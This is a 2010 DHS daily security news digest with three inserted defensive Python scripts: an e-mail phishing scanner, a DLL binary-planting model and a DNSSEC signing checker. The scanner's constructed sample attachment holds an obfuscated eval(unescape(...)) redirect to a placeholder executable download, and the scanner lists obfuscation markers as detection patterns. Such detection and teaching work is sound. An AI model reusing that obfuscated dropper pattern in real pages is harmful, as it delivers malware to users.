Wednesday, December 8, 2010

Complete DHS Daily Report for December 8, 2010

Daily Report

Top Stories

• KMPH 26 Visalia reports that a leak from a valve Monday caused a rail tanker car in Fresno, California, to spill close to 7,500 gallons of the toxic chemical magnesium bisulfite. (See item 5)

5. December 6, KMPH 26 Visalia – (California) Rail car spills hazardous material in southeast Fresno. Shortly after 7:30 a.m. December 6, Fresno, California firefighters arrived at the scene of a hazardous material spill in southeast Fresno. A rail tanker car spilled close to 7,500 gallons of magnesium bisulfite onto the ground at Florence Avenue near Cedar. The battalion chief said the tanker began to leak from one of its bottom valves, but the cause is unknown. Magnesium bisulfite is used in agriculture as a fertilizer. Because the spill was isolated to the area, there appears to be no threat to the public. Magnesium bisulfite is potentially dangerous if inhaled and is capable of burning skin. The toxic chemical was contained thanks to good weather conditions. The responding fire crews wore hazmat and respiratory gear to reduce contamination. The fire department said the U.S. Environmental Protection Agency and the owner of the container, Univar, are looking into clean-up options. Source:

• According to the Seattle Post-Intelligencer, federal charges have been brought against a Washington State man accused of attempting to send 300 satellite components to China. (See item 11)

11. December 6, Seattle Post-Intelligencer – (International) Charge: Woodinville man tried to send military equipment to China. Federal prosecutors have brought charges against a 46-year-old man from Woodinville, Washington, accused of smuggling military equipment to China. The suspect was arrested December 3 after nearly 2 years of investigation by the FBI. He is alleged to have attempted to send 300 satellite components to China. He allegedly told an informant the parts were meant for the China Space Technology Co.’s spacecraft program. On another occasion, federal investigators contend, the suspect said some of the parts would be used in the design of “China’s new generation of passenger jet.” Prosecutors contend he agreed to pay $620,000 to obtain the parts. The suspect is charged with conspiracy to violate federal arms control laws, which carries a maximum term of 5 years in prison. Source:


Banking and Finance Sector

12. December 7, Softpedia – (International) Fake Google and Facebook joint prize campaign leads to Zbot. Security researchers warn that spam e-mails announcing a joint prize giveaway from Google and Facebook ultimately lead to a variant of the Zbot banking Trojan. The fake e-mails purport to come from the “Google and Facebook team” and claim the two companies have decided to join together to give prizes away to users. The e-mails read: “Dear subscriber, As you may know, the holidays are just around the corner, so all of us here at Google and Facebook decided to come together and bring you a new contest with lots of prizes, including, but not limited to, the new Google Chrome OS which will be released in January 2011, Nexus One smartphones, Google Maps GPS for your favourite mobile phone and lots more. Think of it as our way of saying: ‘Thank you!’ for supporting our work all this time. For a chance to win, all you have to do is go to the attached page and follow the instructions. Hope you enjoy, Google & Facebook.” Two of the three prizes mentioned are actually free products, and all are from Google. The attached file is called “Google & Facebook.html” and contains obfuscated JavaScript code. When opened in a browser it redirects to a Web site that serves an executable. According to BitDefender security researchers, the file is a Trojan downloader written in .NET, which requires the .NET Framework to be installed on the targeted system in order to run. The original dropper installs a secondary downloader that distributes several information-stealing Trojans, including Zbot. Source:

13. December 7, Associated Press – (Oregon) FBI: 2 arrests 20 minutes after Ore. bank robbery. The FBI said it took just about 20 minutes for authorities to arrest two women after a robbery at a Clackamas, Oregon, credit union southeast of Portland. An FBI spokeswoman said witnesses report that a woman walked into a Rivermark Community Credit Union about 5 p.m. December 6 and demanded cash. The spokeswoman said the robber left with an undisclosed amount. At about 5:20 p.m., investigators surrounded a southeast Portland home and arrested the two female suspects. The two were booked into the Multnomah County Jail for investigation of bank robbery. The Oregonian said the Clackamas County sheriff’s office, Portland police, and the FBI were involved in the investigation. Source:

14. December 6, Softpedia – (International) ZeuS-related fake electronic tax payment emails are back. Security researchers warn of a new wave of fake Electronic Federal Tax Payment System (EFTPS) e-mails directing users to drive-by download Web sites that distribute the ZeuS banking Trojan. The fake e-mails claim the recipient’s electronic tax payment was rejected due to an error in the submission form. They read: “Your Federal Tax Payment ID: ######## has been rejected. [where # is a digit] Return Reason Code R21 - The identification number used in the Company Identification Field is not valid. Please, check the information and refer to Code R21 to get details about your company payment in transaction contacts section: In other way forward information to your accountant adviser. EFTPS: The Electronic Federal Payment System PLEASE NOTE: Your tax payment is due regardless of EFTPS online availability. In case of an emergency, you can always make your tax payment by calling the EFTPS.” The attack appears to target businesses, which will be required to use EFTPS as the default tax payment method from January 2011. According to security researchers from M86 Security, who analyzed the e-mails, the included link takes users to an attack page that tries to exploit vulnerabilities in outdated versions of Java and Adobe Reader. In particular, the exploit pack targets four vulnerabilities in Java and one in Adobe Reader. Successful exploitation of any of them results in a variant of the ZeuS banking Trojan being installed on the system. Source:
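The two campaigns in items 12 and 14 rely on the same two tricks: an HTML attachment whose obfuscated script sends the browser to a site serving an executable, and a link whose host is not the brand the message claims to be from (eftps.gov). The following Python script is added here as an illustration; it is not part of the DHS report nor the BitDefender or M86 analyses. It scans a raw e-mail for those indicators using only the standard library. The two sample messages are constructed for the example, modelled on the campaigns described above; the sender addresses, hosts and payload URL in them are placeholders, not indicators from the real spam.

```python
import email
import email.policy
import re
from urllib.parse import unquote, urlparse

# Calls obfuscated droppers use to unpack and run a payload.
OBFUSCATION_MARKERS = ("eval(", "unescape(", "String.fromCharCode", "document.write(")
# Ways a page sends the browser somewhere else (the site serving the .exe).
REDIRECT_MARKERS = ("window.location", "document.location", "location.href", "location.replace(")
# Eight or more consecutive %XX / \xXX / \uXXXX escapes: a packed string, not text.
ESCAPE_RUN = re.compile(r"(?:%[0-9a-fA-F]{2}|\\x[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}){8,}")
URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def analyse_script(src):
    """Indicators in a JavaScript/HTML string, checked on the raw text and on one
    layer of %XX-decoding (what unescape() would hand to eval())."""
    decoded = unquote(src)
    found = []
    for marker in OBFUSCATION_MARKERS + REDIRECT_MARKERS:
        if marker in src:
            found.append(marker)
        elif marker in decoded:
            found.append(marker + " (decoded)")
    if ESCAPE_RUN.search(src):
        found.append("long-escape-run")
    return found


def host_matches(url, domain):
    """True if the URL's host is `domain` or a subdomain of it."""
    host = (urlparse(url).hostname or "").lower()
    return host == domain or host.endswith("." + domain)


def scan_message(raw, brand_domain=None):
    """Return (indicator, detail) pairs for a raw RFC 822 message. brand_domain is
    the domain the mail claims to come from; links pointing elsewhere are reported."""
    msg = email.message_from_string(raw, policy=email.policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if part.get_content_type() == "text/html" or name.lower().endswith((".htm", ".html")):
            findings.append(("html-attachment", name))
            text = part.get_payload(decode=True).decode("utf-8", "replace")
            indicators = analyse_script(text)
            if indicators:
                findings.append(("obfuscated-js", ", ".join(indicators)))
    body = msg.get_body(preferencelist=("html", "plain"))
    for url in URL_RE.findall(body.get_content() if body is not None else ""):
        if brand_domain and not host_matches(url, brand_domain):
            findings.append(("off-brand-link", url))
    return findings


# Constructed sample (not captured spam): the escaped string decodes to
# window.location="http://example.org/prize.exe", the redirect to the dropper.
PRIZE_MAIL = """\
From: "Google and Facebook team" <contest@example.net>
To: subscriber@example.com
Subject: Google & Facebook holiday contest
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

For a chance to win, open the attached page and follow the instructions.
--b1
Content-Type: text/html; charset="utf-8"
Content-Disposition: attachment; filename="Google & Facebook.html"

<html><script>
eval(unescape("%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%3D%22%68%74%74%70%3A%2F%2F%65%78%61%6D%70%6C%65%2E%6F%72%67%2F%70%72%69%7A%65%2E%65%78%65%22"));
</script></html>
--b1--
"""

# Constructed sample modelled on the EFTPS lure: the only link leads off eftps.gov.
EFTPS_MAIL = """\
From: EFTPS <notice@example.net>
To: payroll@example.com
Subject: Your Federal Tax Payment ID: 01234567 has been rejected
MIME-Version: 1.0
Content-Type: text/plain; charset="utf-8"

Return Reason Code R21 - The identification number used in the Company
Identification Field is not valid. Please check the information and refer to
Code R21 in the transaction contacts section: http://eftps.example.net/R21/transactions.php
Your tax payment is due regardless of EFTPS online availability; see https://www.eftps.gov/eftps/
"""

if __name__ == "__main__":
    for label, raw, brand in (("prize mail", PRIZE_MAIL, None), ("EFTPS mail", EFTPS_MAIL, "eftps.gov")):
        print(label)
        for kind, detail in scan_message(raw, brand):
            print(f"  {kind}: {detail}")
```

The decode step matters: the redirect in the first sample never appears in clear text, only after the %XX layer that unescape() would strip, so a scanner that greps the raw attachment for "location" misses it. The link check deliberately accepts subdomains of the brand domain and nothing else; the second sample's genuine eftps.gov link is left alone while the look-alike host is reported.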

15. December 6, Los Angeles Times – (California) West Covina man sentenced to prison for Ponzi scheme. A West Covina, California man was sentenced December 6 to 11 years and 3 months in federal prison for running a Ponzi scheme that brought in about $4 million from more than 107 victims. The convict was also ordered to pay $2,200,771 in restitution to his victims, whom he lured into his investment scheme by promising “guaranteed” annual interest rates as high as 120 percent, according to the U.S. attorney’s office in Los Angeles. The convict, who is a Mexican national, was sentenced by a U.S. District Judge. He was arrested in October 2009 after the FBI searched his West Covina business, New Golden Investments Group, also known as NGI Group, the U.S. attorney’s office said. The convict was indicted in May, and on September 17 he pleaded guilty to one count of mail fraud, one count of money laundering, and one count of misuse of a Social Security number, the statement said. Source:

Information Technology

42. December 7, Help Net Security – (International) Search results for Mono Lake lead to malware. The recent discovery by NASA scientists of a bacterium that uses arsenic in its cellular structure has prompted many people to search the Web for information about it and about the place where it was discovered, Mono Lake in California. As with many other topics that have fired up public imagination and curiosity, malware peddlers have seized the opportunity to funnel that traffic their way with an SEO poisoning campaign. Sunbelt researchers report that Google Images results have been poisoned so that certain images redirect users to sites that try to download a rogue security tool, or to fake Firefox update pages urging them to download a supposed browser update. The offered file is a Trojan downloader. Source:

43. December 7, SC Magazine UK – (International) 2010 proves to be the year of the botnet, with new disguise and dropping capabilities expected in 2011. Botnets remained strong in 2010, but new tactics are expected next year. According to the MessageLabs Intelligence 2010 Security Report from Symantec, spam rates peaked in August 2010 at 92.2 percent, with spam from botnets accounting for 88.2 percent of all spam. The report also found that botnets’ share of spam had fallen by the end of 2010, and that the total number of active bots, after rising about 6 percent in the second half of the year, had returned to roughly the level seen at the end of 2009. A MessageLabs Intelligence senior analyst at Symantec Hosted Services said around 5 million bots are generally active at any one time, though the figure varies between 3.5 million and 5.5 million. The report also found that while 2010 saw fluctuation in the number of botnets and their output, the top three botnets did not change in the latter half of 2010, with Rustock remaining the most dominant, followed by Grum and Cutwail. Source:

44. December 6, PC Pro – (International) Single software license shared 774,651 times. A single license for Avast security software has been used by 774,651 people after it went viral on a file-sharing site, according to the company. Avast noticed that a license for its paid-for security software, sold to a 14-user firm in Arizona, was being distributed online. Rather than shut down the piracy, the company decided to see how far the software would spread. The Avast Pro license showed up on file-sharing sites, and a year and a half later it had topped three-quarters of a million active users. “We found our license code at a number of warez sites around the globe,” said the chief executive of Avast Software. “There is a paradox in computer users looking for ‘free’ antivirus programs at locations with a known reputation for spreading malware.” The license is being used in 200 countries. The company is trying to convert users of the pirated copy to genuine software by displaying a notice on machines running the illegally shared edition, with a link to the free or paid-for versions. Source:

45. December 6, Softpedia – (International) Binary planting vulnerability fixed in Adobe Illustrator CS5. A security and stability update has been released for Adobe Illustrator CS5, fixing a DLL preloading (binary planting) vulnerability that could be exploited to execute arbitrary code: the application asks for a DLL by name rather than by full path, so a malicious DLL placed in a directory the loader searches first gets loaded instead. Because Illustrator can open files directly from network shares or WebDAV resources, a DLL planted alongside a document on such a share gives the flaw a remote attack vector. The vulnerability is identified as CVE-2010-3152 and Adobe rates it as “important.” Users of Illustrator CS5 version 15.0.1 or earlier are strongly advised to install the 15.0.2 update as soon as possible. In addition to the security content, the update contains a series of other bug fixes. Source:
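What makes a DLL preloading bug remotely exploitable is the loader’s search order for a DLL requested by bare name: after the application directory and the system directories it tries the current working directory, and when a document is opened from a network share or WebDAV resource that directory is the share. The Python model below is added here for illustration; it is neither Adobe’s code nor the Windows loader. It reproduces the documented search order on a scratch directory tree (application directory, system directories, then the current directory under SafeDllSearchMode, which is on by default since Windows XP SP2; current directory second when that mode is off) and shows why the fix is to load DLLs by fully qualified path or to drop the current directory from the search, which an application does with SetDllDirectory("") and an administrator can enforce with the CWDIllegalInDllSearch registry value Microsoft shipped in KB2264107. The directory layout and the DLL names (helper.dll, version.dll, design.ai) are placeholders.

```python
import tempfile
from pathlib import Path

# What the model "loads" is identified by file content (placeholders, not real DLLs).
LEGIT, PLANTED = "legitimate DLL", "attacker's DLL"


def dll_search_order(app_dir, system_dirs, cwd, path_dirs, safe_search=True, cwd_allowed=True):
    """Directories the Windows loader walks for an unqualified DLL name.
    safe_search  models SafeDllSearchMode (default on since Windows XP SP2).
    cwd_allowed  is False when the process called SetDllDirectory("") or the
                 KB2264107 CWDIllegalInDllSearch policy excludes this CWD
                 (value 2 excludes WebDAV and remote shares, 0xFFFFFFFF excludes it always)."""
    cwd_slot = [cwd] if cwd_allowed else []
    if safe_search:
        return [app_dir, *system_dirs, *cwd_slot, *path_dirs]
    return [app_dir, *cwd_slot, *system_dirs, *path_dirs]


def resolve_dll(name, order):
    """Path the loader would map, or None. A fully qualified name skips the search."""
    requested = Path(name)
    if requested.is_absolute():
        return requested if requested.is_file() else None
    for directory in order:
        candidate = Path(directory) / name
        if candidate.is_file():
            return candidate
    return None


def build_scenario():
    """Scratch tree constructed for the example: an app, a system directory and a
    'share' holding the document the victim opens plus two planted DLLs."""
    root = Path(tempfile.mkdtemp(prefix="planting-"))
    app, system, share = root / "App", root / "System32", root / "share"
    for d in (app, system, share):
        d.mkdir()
    (system / "version.dll").write_text(LEGIT)   # a DLL present on every system
    (share / "version.dll").write_text(PLANTED)  # planted copy next to the document
    (share / "helper.dll").write_text(PLANTED)   # DLL the app asks for but never ships
    (share / "design.ai").write_text("document the victim opens from the share")
    return app, system, share


def demo():
    """Resolve both DLLs under each search configuration; return what got loaded."""
    app, system, share = build_scenario()
    cwd = share  # opening \\server\share\design.ai makes the share the CWD
    orders = {
        "safe": dll_search_order(app, [system], cwd, []),
        "legacy": dll_search_order(app, [system], cwd, [], safe_search=False),
        "cwd-removed": dll_search_order(app, [system], cwd, [], cwd_allowed=False),
    }
    results = {}
    for label, order in orders.items():
        for dll in ("helper.dll", "version.dll"):
            hit = resolve_dll(dll, order)
            results[f"{dll} / {label}"] = hit.read_text() if hit else None
    # The application-side fix: ask for the DLL by full path, never by bare name.
    hit = resolve_dll(str(system / "version.dll"), orders["legacy"])
    results["version.dll / full-path"] = hit.read_text() if hit else None
    return results


if __name__ == "__main__":
    for case, loaded in demo().items():
        print(f"{case:28} -> {loaded or 'load fails (no code runs)'}")
```

The run makes the two halves of the problem visible: SafeDllSearchMode protects a DLL that really exists in the system directory (version.dll resolves to the legitimate copy), but does nothing for a DLL the application looks for and nobody ships (helper.dll still comes from the share), which is the usual binary-planting case. Only removing the current directory from the search, or loading by full path, closes both.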

46. December 6, TechWorld – (International) Internet Explorer ‘protected mode’ weakness spelled out. Researchers have found a chink in Internet Explorer’s “protected mode” security armor that hints at trouble for other Windows applications built around the same technology, including Google’s Chrome and Adobe’s new Reader X. In a new paper, Verizon Business researchers document ways an attacker could get content treated as belonging to a zone where Protected Mode does not apply, such as the Local Intranet zone (which covers UNC paths), or could spoof the trusted-sites list. This leads to a relatively simple attack: malware already running as a low-integrity process starts a small Web server bound to a local loopback port. Although that process is itself confined by protected mode, it can point IE at an address that appears to lie in the Local Intranet zone, and the page it serves then renders at medium integrity, a potentially dangerous privilege escalation. The weakness found by Verizon does not directly affect other applications that use protected-mode-style sandboxing, such as Adobe Reader X or Google Chrome, but it shows how such protection mechanisms remain open to attack because some elements of a system have to be trusted. Source:

47. December 3, The Register – (International) Popular sites caught sniffing user browser history. Security experts from Southern California have caught YouPorn and 45 other sites pilfering visitors’ surfing habits in what is believed to be the first study to measure in-the-wild exploitation of a decade-old browser vulnerability. YouPorn uses JavaScript to detect whether visitors have recently browsed to any of more than 20 other sites, according to the study. The study examined the 50,000 most popular Web sites and found 46 offenders in all, among them news, finance, and sports sites. “We found that several popular sites — including an Alexa global top-100 site — make use of history sniffing to exfiltrate information about users’ browsing history, and, in some cases, do so in an obfuscated manner to avoid easy detection,” the report states. “While researchers have known about the possibility of such attacks, hitherto it was not known how prevalent they are in real, popular websites.” The 46 sites exploit a widely known weakness (a page can tell from the styling the browser applies to a link whether the user has already visited that link’s target) that exists in every production browser except Apple’s Safari. The study also detected code on sites maintained by Microsoft, YouTube, Yahoo, and others that performs what the scientists called “behavioral sniffing.” Source:

Communications Sector

48. December 7, The Register – (International) Hacker brings enhanced security to jailbroken iPhones. A computer consultant is adding a security measure known as ASLR to iPhones to make them more resistant to malware attacks. Short for address space layout randomization, ASLR has been absent from all iOS devices since their inception, making possible the types of attacks that commandeered a fully patched iPhone at the Pwn2Own hacker contest. By randomizing where libraries, the stack, and the heap are placed in memory, ASLR aims to thwart such exploits by denying an attacker the fixed addresses a payload needs to know ahead of time. Starting with Windows Vista, Microsoft has built ASLR into its operating system, and the recently released Windows Phone 7 also has the protection, said the principal security analyst at Independent Security Evaluators, citing private conversations with Microsoft engineers. By comparison, Apple has built only limited ASLR into Mac OS X and has left it out of iOS altogether. At a conference scheduled for the week of December 13, a security consultant and application developer for Germany-based SektionEins plans to unveil a process for jailbreaking iDevices that automatically fortifies them with ASLR. It works by reordering the contents of dyld_shared_cache, the large file that holds the system’s shared libraries. Source:

49. December 6, eWeek – (National) DNSSEC Adoption Jumps, But Users Fail to Maintain It Properly: Survey. More and more organizations are enabling DNSSEC on their name servers, but the number of zones actually signed is very low, leaving those organizations as exposed to cache poisoning attacks as before. While organizations are beginning to adopt DNSSEC (Domain Name System Security Extensions) to protect their domains, most have not implemented or maintained it correctly according to the specifications, according to a survey released by Infoblox December 6. The sixth annual survey of domain name server infrastructure on the Internet is a “census of name servers,” the vice president of architecture at Infoblox said. The survey identified 15.6 million name servers on the Internet and covered only the .org, .com, and .net domains, he said. While adoption of the DNS Security Extensions jumped a dramatic 340 percent from 2009, the number of zones that have been signed is less than 1 percent, the survey said. Considering that organizations went through the trouble of setting up DNSSEC on their name servers, the fact that only 0.022 percent of zones were signed was “surprisingly high” and a “clear indicator” they were not configuring or maintaining them correctly, the vice president said. In 2009, the number was even smaller, at 0.005 percent, he said. DNSSEC is a set of extensions that let a resolver verify that DNS data came from the zone’s operator and was not forged in transit; it protects the name lookup, not the Web server the lookup points to. In a cache poisoning attack, an attacker plants forged records in a resolver’s cache so that users are sent to a different Web site without realizing it. Source:
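The gap the survey describes, a name server that speaks DNSSEC but serves a zone nobody signed, can be checked on the wire: send a DNSKEY query with the EDNS0 DO bit set and see whether the answer carries DNSKEY and RRSIG records, or only echoes the DO bit back. The Python below is added here as an illustration and is not Infoblox’s survey tooling. It builds and parses the DNS messages with the standard library only, classifies a constructed reply (not captured traffic) for the offline demonstration, and includes a live query function whose defaults (resolver 8.8.8.8, zone example.org.) are placeholders to swap for the zone and server under test. Querying a recursive resolver tells you about the zone; to see whether a particular authoritative server is DNSSEC-aware, point server at it.

```python
import socket
import struct

DNSKEY, RRSIG, OPT, IN = 48, 46, 41, 1
DO_FLAG = 0x8000  # DNSSEC OK bit, carried in the OPT record's "TTL" field


def encode_name(name):
    """Wire-format a dotted name: length-prefixed labels ended by a zero byte."""
    labels = [l for l in name.rstrip(".").split(".") if l]
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def decode_name(data, off):
    """Read a (possibly compressed) name at `off`; return (name, offset after it)."""
    labels, end = [], None
    while True:
        length = data[off]
        if length & 0xC0 == 0xC0:                  # compression pointer
            if end is None:
                end = off + 2
            off = struct.unpack("!H", data[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if length == 0:
            break
        labels.append(data[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels) + ".", (off if end is None else end)


def build_rr(name, rtype, rdata, ttl=3600):
    return encode_name(name) + struct.pack("!HHIH", rtype, IN, ttl, len(rdata)) + rdata


def opt_rr(do=True, udp_size=4096):
    """EDNS0 OPT pseudo-record: class carries the UDP size, TTL carries the flags."""
    return b"\x00" + struct.pack("!HHIH", OPT, udp_size, DO_FLAG if do else 0, 0)


def build_query(zone, qtype=DNSKEY, txid=0x1234, do=True):
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 1 if do else 0)  # RD=1
    return header + encode_name(zone) + struct.pack("!HH", qtype, IN) + (opt_rr(do) if do else b"")


def parse_message(data):
    """rcode, (name, type) pairs per section, and whether an OPT record set DO."""
    _, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", data[:12])
    off = 12
    for _ in range(qd):
        _, off = decode_name(data, off)
        off += 4                                   # QTYPE + QCLASS
    msg = {"rcode": flags & 0xF, "do": False, "answer": [], "authority": [], "additional": []}
    for section, count in (("answer", an), ("authority", ns), ("additional", ar)):
        for _ in range(count):
            name, off = decode_name(data, off)
            rtype, _, ttl, rdlen = struct.unpack("!HHIH", data[off:off + 10])
            off += 10 + rdlen
            if rtype == OPT:
                msg["do"] = bool(ttl & DO_FLAG)
            msg[section].append((name, rtype))
    return msg


def classify(msg):
    """'signed' needs DNSKEY plus its RRSIG; a DO echo alone only shows the server
    speaks DNSSEC, which is exactly the gap the survey describes."""
    types = {rtype for _, rtype in msg["answer"]}
    if DNSKEY in types and RRSIG in types:
        return "signed"
    return "dnssec-aware, zone unsigned" if msg["do"] else "no DNSSEC"


def query_dnskey(zone="example.org.", server="8.8.8.8", timeout=3.0):
    """Live check over UDP (needs network); `server` may be an authoritative server."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_query(zone), (server, 53))
        data, _ = sock.recvfrom(4096)
    return classify(parse_message(data))


def sample_response(zone, signed, do=True, txid=0x1234):
    """Constructed reply (not captured traffic) in the shape a resolver returns."""
    answers = b""
    if signed:
        # DNSKEY rdata: flags 257 (KSK), protocol 3, algorithm 8, dummy key bytes
        answers += build_rr(zone, DNSKEY, struct.pack("!HBB", 257, 3, 8) + b"\x42" * 36)
        # RRSIG rdata: type covered, alg, labels, original TTL, expiry, inception,
        # key tag, signer name, dummy signature
        rrsig = struct.pack("!HBBIIIH", DNSKEY, 8, 2, 3600, 1293753600, 1292544000, 12345)
        answers += build_rr(zone, RRSIG, rrsig + encode_name(zone) + b"\x00" * 32)
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 2 if signed else 0, 0, 1 if do else 0)
    question = encode_name(zone) + struct.pack("!HH", DNSKEY, IN)
    return header + question + answers + (opt_rr(do) if do else b"")


if __name__ == "__main__":
    for signed, do in ((True, True), (False, True), (False, False)):
        print(classify(parse_message(sample_response("example.org.", signed, do))))
```

The classification deliberately stops at "are DNSKEY and RRSIG published": validating the signature chain up to the root is a separate step, and a zone can publish keys and signatures that are expired or do not chain, which is the maintenance failure the survey is pointing at. Checking the RRSIG expiry field (the fifth field of the rdata) against the current time is the cheapest next check to add.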